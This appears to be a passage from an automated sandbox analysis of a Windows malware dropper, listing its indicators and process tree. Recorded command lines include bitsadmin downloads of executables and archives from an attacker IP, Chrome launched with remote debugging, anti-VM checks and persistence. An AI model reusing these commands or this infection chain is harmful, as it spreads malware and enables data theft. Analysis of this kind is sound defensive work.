rWmzULI.exemsedge.exefirefox.exefirefox.exedescription ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 rWmzULI.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString rWmzULI.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid Process 5592 timeout.exe -
Enumerates system info in registry 2 TTPs 8 IoCs
Processes:
chrome.exemsedge.exemsedge.exedescription ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe -
Kills process with taskkill 5 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid Process 4360 taskkill.exe 2720 taskkill.exe 4960 taskkill.exe 2424 taskkill.exe 5612 taskkill.exe -
Modifies data under HKEY_USERS 2 IoCs
Processes:
chrome.exedescription ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133773259980828635" chrome.exe -
Modifies registry class 26 IoCs
Processes:
regasm.exefirefox.exedescription ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{13790826-15FA-46D0-9814-C2A5C6C11F32}\ProgId\ = "TaskbarMonitor.Deskband" regasm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{13790826-15FA-46D0-9814-C2A5C6C11F32}\InprocServer32\ThreadingModel = "Both" regasm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{13790826-15FA-46D0-9814-C2A5C6C11F32}\InprocServer32\Assembly = "TaskbarMonitor, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null" regasm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{13790826-15FA-46D0-9814-C2A5C6C11F32}\InprocServer32\1.0.0.0\Class = "TaskbarMonitor.Deskband" regasm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{13790826-15FA-46D0-9814-C2A5C6C11F32}\InprocServer32\1.0.0.0\Assembly = "TaskbarMonitor, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null" regasm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{13790826-15FA-46D0-9814-C2A5C6C11F32}\ProgId regasm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Component Categories\{62C8FE65-4EBB-45E7-B440-6E39B2CDBF29}\0 = ".NET Category" regasm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TaskbarMonitor.Deskband\CLSID regasm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{13790826-15FA-46D0-9814-C2A5C6C11F32}\InprocServer32\RuntimeVersion = "v4.0.30319" regasm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{13790826-15FA-46D0-9814-C2A5C6C11F32}\InprocServer32\1.0.0.0\RuntimeVersion = "v4.0.30319" regasm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{13790826-15FA-46D0-9814-C2A5C6C11F32}\InprocServer32\1.0.0.0\CodeBase = "file:///C:/Program Files/TaskbarMonitor/TaskbarMonitor.DLL" regasm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{13790826-15FA-46D0-9814-C2A5C6C11F32}\Implemented Categories\{62C8FE65-4EBB-45e7-B440-6E39B2CDBF29} regasm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TaskbarMonitor.Deskband\CLSID\ = "{13790826-15FA-46D0-9814-C2A5C6C11F32}" regasm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{13790826-15FA-46D0-9814-C2A5C6C11F32} regasm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{13790826-15FA-46D0-9814-C2A5C6C11F32}\InprocServer32\Class = "TaskbarMonitor.Deskband" regasm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{13790826-15FA-46D0-9814-C2A5C6C11F32}\ = "taskbar-monitor" regasm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{13790826-15FA-46D0-9814-C2A5C6C11F32}\Implemented Categories\{00021492-0000-0000-c000-000000000046} regasm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{13790826-15FA-46D0-9814-C2A5C6C11F32}\InprocServer32\CodeBase = "file:///C:/Program Files/TaskbarMonitor/TaskbarMonitor.DLL" regasm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{13790826-15FA-46D0-9814-C2A5C6C11F32}\InprocServer32\1.0.0.0 regasm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{13790826-15FA-46D0-9814-C2A5C6C11F32}\Implemented Categories regasm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TaskbarMonitor.Deskband regasm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TaskbarMonitor.Deskband\ = "TaskbarMonitor.Deskband" regasm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{13790826-15FA-46D0-9814-C2A5C6C11F32}\ = "TaskbarMonitor.Deskband" regasm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{13790826-15FA-46D0-9814-C2A5C6C11F32}\InprocServer32 regasm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{13790826-15FA-46D0-9814-C2A5C6C11F32}\InprocServer32\ = "mscoree.dll" regasm.exe Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings firefox.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
SystemCare1.0.exepid Process 776 SystemCare1.0.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
aadc5df9b60a87ade5c319c6723d16aa4401f531d89aaf4d8b3f0f3e1cf54551.exeskotes.exeskotes.exenbea1t8.exemsiexec.exepowershell.exeskotes.exeSystemCare1.0.exepowershell.exepowershell.exe552420d9a1.exerWmzULI.exedcb24ae08a.exechrome.exeeb96d7e10f.exe3a3927d69a.exemsedge.exepid Process 4216 aadc5df9b60a87ade5c319c6723d16aa4401f531d89aaf4d8b3f0f3e1cf54551.exe 4216 aadc5df9b60a87ade5c319c6723d16aa4401f531d89aaf4d8b3f0f3e1cf54551.exe 4824 skotes.exe 4824 skotes.exe 4044 skotes.exe 4044 skotes.exe 2100 nbea1t8.exe 2100 nbea1t8.exe 3024 msiexec.exe 3024 msiexec.exe 3636 powershell.exe 3636 powershell.exe 3636 powershell.exe 3616 skotes.exe 3616 skotes.exe 776 SystemCare1.0.exe 776 SystemCare1.0.exe 4112 powershell.exe 4112 powershell.exe 4112 powershell.exe 4112 powershell.exe 4112 powershell.exe 624 powershell.exe 624 powershell.exe 624 powershell.exe 1732 552420d9a1.exe 1732 552420d9a1.exe 1732 552420d9a1.exe 1732 552420d9a1.exe 1732 552420d9a1.exe 1732 552420d9a1.exe 1732 552420d9a1.exe 1732 552420d9a1.exe 1732 552420d9a1.exe 1732 552420d9a1.exe 4904 rWmzULI.exe 4904 rWmzULI.exe 4904 rWmzULI.exe 4904 rWmzULI.exe 4828 dcb24ae08a.exe 4828 dcb24ae08a.exe 4904 rWmzULI.exe 4904 rWmzULI.exe 4156 chrome.exe 4156 chrome.exe 4904 rWmzULI.exe 4904 rWmzULI.exe 5516 eb96d7e10f.exe 5516 eb96d7e10f.exe 5516 eb96d7e10f.exe 5516 eb96d7e10f.exe 5516 eb96d7e10f.exe 5516 eb96d7e10f.exe 5516 eb96d7e10f.exe 5516 eb96d7e10f.exe 5516 eb96d7e10f.exe 5516 eb96d7e10f.exe 5808 3a3927d69a.exe 5808 3a3927d69a.exe 4904 rWmzULI.exe 4904 rWmzULI.exe 5968 msedge.exe 5968 msedge.exe 5968 msedge.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
Processes:
chrome.exemsedge.exepid Process 4156 chrome.exe 4156 chrome.exe 4156 chrome.exe 5940 msedge.exe 5940 msedge.exe 5940 msedge.exe 5940 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
msiexec.exeTcMBq5M.exedescription pid Process Token: SeSecurityPrivilege 3024 msiexec.exe Token: SeCreateTokenPrivilege 1056 TcMBq5M.exe Token: SeAssignPrimaryTokenPrivilege 1056 TcMBq5M.exe Token: SeLockMemoryPrivilege 1056 TcMBq5M.exe Token: SeIncreaseQuotaPrivilege 1056 TcMBq5M.exe Token: SeMachineAccountPrivilege 1056 TcMBq5M.exe Token: SeTcbPrivilege 1056 TcMBq5M.exe Token: SeSecurityPrivilege 1056 TcMBq5M.exe Token: SeTakeOwnershipPrivilege 1056 TcMBq5M.exe Token: SeLoadDriverPrivilege 1056 TcMBq5M.exe Token: SeSystemProfilePrivilege 1056 TcMBq5M.exe Token: SeSystemtimePrivilege 1056 TcMBq5M.exe Token: SeProfSingleProcessPrivilege 1056 TcMBq5M.exe Token: SeIncBasePriorityPrivilege 1056 TcMBq5M.exe Token: SeCreatePagefilePrivilege 1056 TcMBq5M.exe Token: SeCreatePermanentPrivilege 1056 TcMBq5M.exe Token: SeBackupPrivilege 1056 TcMBq5M.exe Token: SeRestorePrivilege 1056 TcMBq5M.exe Token: SeShutdownPrivilege 1056 TcMBq5M.exe Token: SeDebugPrivilege 1056 TcMBq5M.exe Token: SeAuditPrivilege 1056 TcMBq5M.exe Token: SeSystemEnvironmentPrivilege 1056 TcMBq5M.exe Token: SeChangeNotifyPrivilege 1056 TcMBq5M.exe Token: SeRemoteShutdownPrivilege 1056 TcMBq5M.exe Token: SeUndockPrivilege 1056 TcMBq5M.exe Token: SeSyncAgentPrivilege 1056 TcMBq5M.exe Token: SeEnableDelegationPrivilege 1056 TcMBq5M.exe Token: SeManageVolumePrivilege 1056 TcMBq5M.exe Token: SeImpersonatePrivilege 1056 TcMBq5M.exe Token: SeCreateGlobalPrivilege 1056 TcMBq5M.exe Token: SeCreateTokenPrivilege 1056 TcMBq5M.exe Token: SeAssignPrimaryTokenPrivilege 1056 TcMBq5M.exe Token: SeLockMemoryPrivilege 1056 TcMBq5M.exe Token: SeIncreaseQuotaPrivilege 1056 TcMBq5M.exe Token: SeMachineAccountPrivilege 1056 TcMBq5M.exe Token: SeTcbPrivilege 1056 TcMBq5M.exe Token: SeSecurityPrivilege 1056 TcMBq5M.exe Token: SeTakeOwnershipPrivilege 1056 TcMBq5M.exe Token: SeLoadDriverPrivilege 1056 TcMBq5M.exe Token: SeSystemProfilePrivilege 1056 TcMBq5M.exe Token: SeSystemtimePrivilege 1056 TcMBq5M.exe Token: SeProfSingleProcessPrivilege 1056 TcMBq5M.exe Token: SeIncBasePriorityPrivilege 1056 TcMBq5M.exe Token: SeCreatePagefilePrivilege 1056 TcMBq5M.exe Token: SeCreatePermanentPrivilege 1056 TcMBq5M.exe Token: SeBackupPrivilege 1056 TcMBq5M.exe Token: SeRestorePrivilege 1056 TcMBq5M.exe Token: SeShutdownPrivilege 1056 TcMBq5M.exe Token: SeDebugPrivilege 1056 TcMBq5M.exe Token: SeAuditPrivilege 1056 TcMBq5M.exe Token: SeSystemEnvironmentPrivilege 1056 TcMBq5M.exe Token: SeChangeNotifyPrivilege 1056 TcMBq5M.exe Token: SeRemoteShutdownPrivilege 1056 TcMBq5M.exe Token: SeUndockPrivilege 1056 TcMBq5M.exe Token: SeSyncAgentPrivilege 1056 TcMBq5M.exe Token: SeEnableDelegationPrivilege 1056 TcMBq5M.exe Token: SeManageVolumePrivilege 1056 TcMBq5M.exe Token: SeImpersonatePrivilege 1056 TcMBq5M.exe Token: SeCreateGlobalPrivilege 1056 TcMBq5M.exe Token: SeCreateTokenPrivilege 1056 TcMBq5M.exe Token: SeAssignPrimaryTokenPrivilege 1056 TcMBq5M.exe Token: SeLockMemoryPrivilege 1056 TcMBq5M.exe Token: SeIncreaseQuotaPrivilege 1056 TcMBq5M.exe Token: SeMachineAccountPrivilege 1056 TcMBq5M.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
aadc5df9b60a87ade5c319c6723d16aa4401f531d89aaf4d8b3f0f3e1cf54551.exeTcMBq5M.exemsiexec.exechrome.exemsedge.exebf76d50978.exefirefox.exepid Process 4216 aadc5df9b60a87ade5c319c6723d16aa4401f531d89aaf4d8b3f0f3e1cf54551.exe 1056 TcMBq5M.exe 536 msiexec.exe 536 msiexec.exe 4156 chrome.exe 4156 chrome.exe 4156 chrome.exe 4156 chrome.exe 4156 chrome.exe 4156 chrome.exe 4156 chrome.exe 4156 chrome.exe 4156 chrome.exe 4156 chrome.exe 4156 chrome.exe 4156 chrome.exe 4156 chrome.exe 4156 chrome.exe 4156 chrome.exe 4156 chrome.exe 4156 chrome.exe 4156 chrome.exe 4156 chrome.exe 4156 chrome.exe 4156 chrome.exe 4156 chrome.exe 4156 chrome.exe 4156 chrome.exe 4156 chrome.exe 4156 chrome.exe 5940 msedge.exe 5940 msedge.exe 5940 msedge.exe 5940 msedge.exe 5940 msedge.exe 5940 msedge.exe 5940 msedge.exe 5940 msedge.exe 5940 msedge.exe 5940 msedge.exe 5940 msedge.exe 5940 msedge.exe 5940 msedge.exe 5940 msedge.exe 5940 msedge.exe 5940 msedge.exe 5940 msedge.exe 5940 msedge.exe 5940 msedge.exe 5940 msedge.exe 5940 msedge.exe 5940 msedge.exe 5940 msedge.exe 5940 msedge.exe 5940 msedge.exe 5592 bf76d50978.exe 5592 bf76d50978.exe 5592 bf76d50978.exe 5592 bf76d50978.exe 5592 bf76d50978.exe 5592 bf76d50978.exe 5592 bf76d50978.exe 4468 firefox.exe 4468 firefox.exe -
Suspicious use of SendNotifyMessage 31 IoCs
Processes:
bf76d50978.exefirefox.exepid Process 5592 bf76d50978.exe 5592 bf76d50978.exe 5592 bf76d50978.exe 5592 bf76d50978.exe 5592 bf76d50978.exe 5592 bf76d50978.exe 5592 bf76d50978.exe 4468 firefox.exe 4468 firefox.exe 4468 firefox.exe 4468 firefox.exe 4468 firefox.exe 4468 firefox.exe 4468 firefox.exe 4468 firefox.exe 4468 firefox.exe 4468 firefox.exe 4468 firefox.exe 4468 firefox.exe 4468 firefox.exe 4468 firefox.exe 4468 firefox.exe 4468 firefox.exe 4468 firefox.exe 4468 firefox.exe 4468 firefox.exe 4468 firefox.exe 5592 bf76d50978.exe 5592 bf76d50978.exe 5592 bf76d50978.exe 5592 bf76d50978.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
Processes:
SystemCare1.0.exefirefox.exepid Process 776 SystemCare1.0.exe 776 SystemCare1.0.exe 776 SystemCare1.0.exe 776 SystemCare1.0.exe 4468 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
aadc5df9b60a87ade5c319c6723d16aa4401f531d89aaf4d8b3f0f3e1cf54551.exeskotes.exeTaskbarMonitorInstaller.exetvtC9D3.exeuxN4wDZ.exemsiexec.exeTcMBq5M.exeMsiExec.exedescription pid Process procid_target PID 4216 wrote to memory of 4824 4216 aadc5df9b60a87ade5c319c6723d16aa4401f531d89aaf4d8b3f0f3e1cf54551.exe 82 PID 4216 wrote to memory of 4824 4216 aadc5df9b60a87ade5c319c6723d16aa4401f531d89aaf4d8b3f0f3e1cf54551.exe 82 PID 4216 wrote to memory of 4824 4216 aadc5df9b60a87ade5c319c6723d16aa4401f531d89aaf4d8b3f0f3e1cf54551.exe 82 PID 4824 wrote to memory of 4812 4824 skotes.exe 90 PID 4824 wrote to memory of 4812 4824 skotes.exe 90 PID 4812 wrote to memory of 4848 4812 TaskbarMonitorInstaller.exe 92 PID 4812 wrote to memory of 4848 4812 TaskbarMonitorInstaller.exe 92 PID 4824 wrote to memory of 2100 4824 skotes.exe 95 PID 4824 wrote to memory of 2100 4824 skotes.exe 95 PID 4824 wrote to memory of 2100 4824 skotes.exe 95 PID 4824 wrote to memory of 3872 4824 skotes.exe 96 PID 4824 wrote to memory of 3872 4824 skotes.exe 96 PID 4824 wrote to memory of 3872 4824 skotes.exe 96 PID 3872 wrote to memory of 4688 3872 tvtC9D3.exe 97 PID 3872 wrote to memory of 4688 3872 tvtC9D3.exe 97 PID 3872 wrote to memory of 4688 3872 tvtC9D3.exe 97 PID 3872 wrote to memory of 2844 3872 tvtC9D3.exe 99 PID 3872 wrote to memory of 2844 3872 tvtC9D3.exe 99 PID 3872 wrote to memory of 2844 3872 tvtC9D3.exe 99 PID 4824 wrote to memory of 4184 4824 skotes.exe 102 PID 4824 wrote to memory of 4184 4824 skotes.exe 102 PID 4824 wrote to memory of 4184 4824 skotes.exe 102 PID 4184 wrote to memory of 4892 4184 uxN4wDZ.exe 104 PID 4184 wrote to memory of 4892 4184 uxN4wDZ.exe 104 PID 4184 wrote to memory of 4892 4184 uxN4wDZ.exe 104 PID 4184 wrote to memory of 4908 4184 uxN4wDZ.exe 105 PID 4184 wrote to memory of 4908 4184 uxN4wDZ.exe 105 PID 4184 wrote to memory of 4908 4184 uxN4wDZ.exe 105 PID 4184 wrote to memory of 4908 4184 uxN4wDZ.exe 105 PID 4184 wrote to memory of 4908 4184 uxN4wDZ.exe 105 PID 4184 wrote to memory of 4908 4184 uxN4wDZ.exe 105 PID 4184 wrote to memory of 4908 4184 uxN4wDZ.exe 105 PID 4184 wrote to memory of 4908 4184 uxN4wDZ.exe 105 PID 4184 wrote to memory of 4908 4184 uxN4wDZ.exe 105 PID 4184 wrote to memory of 4908 4184 uxN4wDZ.exe 105 PID 3872 wrote to memory of 2932 3872 tvtC9D3.exe 108 PID 3872 wrote to memory of 2932 3872 tvtC9D3.exe 108 PID 3872 wrote to memory of 2932 3872 tvtC9D3.exe 108 PID 4824 wrote to memory of 1056 4824 skotes.exe 110 PID 4824 wrote to memory of 1056 4824 skotes.exe 110 PID 4824 wrote to memory of 1056 4824 skotes.exe 110 PID 3024 wrote to memory of 4260 3024 msiexec.exe 113 PID 3024 wrote to memory of 4260 3024 msiexec.exe 113 PID 3024 wrote to memory of 4260 3024 msiexec.exe 113 PID 1056 wrote to memory of 536 1056 TcMBq5M.exe 114 PID 1056 wrote to memory of 536 1056 TcMBq5M.exe 114 PID 1056 wrote to memory of 536 1056 TcMBq5M.exe 114 PID 3024 wrote to memory of 336 3024 msiexec.exe 118 PID 3024 wrote to memory of 336 3024 msiexec.exe 118 PID 3024 wrote to memory of 228 3024 msiexec.exe 120 PID 3024 wrote to memory of 228 3024 msiexec.exe 120 PID 3024 wrote to memory of 228 3024 msiexec.exe 120 PID 228 wrote to memory of 3636 228 MsiExec.exe 121 PID 228 wrote to memory of 3636 228 MsiExec.exe 121 PID 228 wrote to memory of 3636 228 MsiExec.exe 121 PID 4824 wrote to memory of 4904 4824 skotes.exe 125 PID 4824 wrote to memory of 4904 4824 skotes.exe 125 PID 4824 wrote to memory of 4904 4824 skotes.exe 125 PID 3024 wrote to memory of 776 3024 msiexec.exe 126 PID 3024 wrote to memory of 776 3024 msiexec.exe 126 PID 3024 wrote to memory of 776 3024 msiexec.exe 126 PID 3024 wrote to memory of 2280 3024 msiexec.exe 127 PID 3024 wrote to memory of 2280 3024 msiexec.exe 127 PID 3024 wrote to memory of 2280 3024 msiexec.exe 127 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\aadc5df9b60a87ade5c319c6723d16aa4401f531d89aaf4d8b3f0f3e1cf54551.exe"C:\Users\Admin\AppData\Local\Temp\aadc5df9b60a87ade5c319c6723d16aa4401f531d89aaf4d8b3f0f3e1cf54551.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4216 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4824 -
C:\Users\Admin\AppData\Local\Temp\1009882001\TaskbarMonitorInstaller.exe"C:\Users\Admin\AppData\Local\Temp\1009882001\TaskbarMonitorInstaller.exe"3⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:4812 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe" /nologo /codebase "C:\Program Files\TaskbarMonitor\TaskbarMonitor.dll"4⤵
- Loads dropped DLL
- Modifies registry class
PID:4848
-
-
-
C:\Users\Admin\AppData\Local\Temp\1009905001\nbea1t8.exe"C:\Users\Admin\AppData\Local\Temp\1009905001\nbea1t8.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2100
-
-
C:\Users\Admin\AppData\Local\Temp\1009917001\tvtC9D3.exe"C:\Users\Admin\AppData\Local\Temp\1009917001\tvtC9D3.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3872 -
C:\Windows\SysWOW64\ping.exeping -n 1 8.8.8.84⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4688
-
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /transfer "DownloadUnRAR" /priority high "http://194.15.46.189/UnRAR.exe" "C:\Users\Admin\AppData\Local\Temp\UnRAR.exe"4⤵
- Download via BitsAdmin
- System Location Discovery: System Language Discovery
PID:2844
-
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /transfer "DownloadletgrtsC1" /priority high "http://194.15.46.189/letgrtsC1.rar" "C:\Users\Admin\AppData\Local\Temp\letgrtsC1.rar"4⤵
- Download via BitsAdmin
- System Location Discovery: System Language Discovery
PID:2932
-
-
-
C:\Users\Admin\AppData\Local\Temp\1009923001\uxN4wDZ.exe"C:\Users\Admin\AppData\Local\Temp\1009923001\uxN4wDZ.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4184 -
C:\Users\Admin\AppData\Local\Temp\1009923001\uxN4wDZ.exe"C:\Users\Admin\AppData\Local\Temp\1009923001\uxN4wDZ.exe"4⤵
- Executes dropped EXE
PID:4892
-
-
C:\Users\Admin\AppData\Local\Temp\1009923001\uxN4wDZ.exe"C:\Users\Admin\AppData\Local\Temp\1009923001\uxN4wDZ.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4908
-
-
-
C:\Users\Admin\AppData\Local\Temp\1009928001\TcMBq5M.exe"C:\Users\Admin\AppData\Local\Temp\1009928001\TcMBq5M.exe"3⤵
- Executes dropped EXE
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1056 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i C:\Users\Admin\AppData\Local\Temp\{C1F30AD5-204F-4BEE-BC9B-DD775CD60E06}\CD60E06\Click2Profit.msi AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\1009928001\TcMBq5M.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\1009928001\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1732611692 " AI_EUIMSI=""4⤵
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
PID:536
-
-
-
C:\Users\Admin\AppData\Local\Temp\1010066001\rWmzULI.exe"C:\Users\Admin\AppData\Local\Temp\1010066001\rWmzULI.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:4904 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"4⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:4156 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff80cdecc40,0x7ff80cdecc4c,0x7ff80cdecc585⤵PID:696
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1908,i,5788027168290259570,2329124065303137069,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1904 /prefetch:25⤵PID:4612
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2132,i,5788027168290259570,2329124065303137069,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2168 /prefetch:35⤵PID:2300
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2220,i,5788027168290259570,2329124065303137069,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2452 /prefetch:85⤵PID:4640
-
-
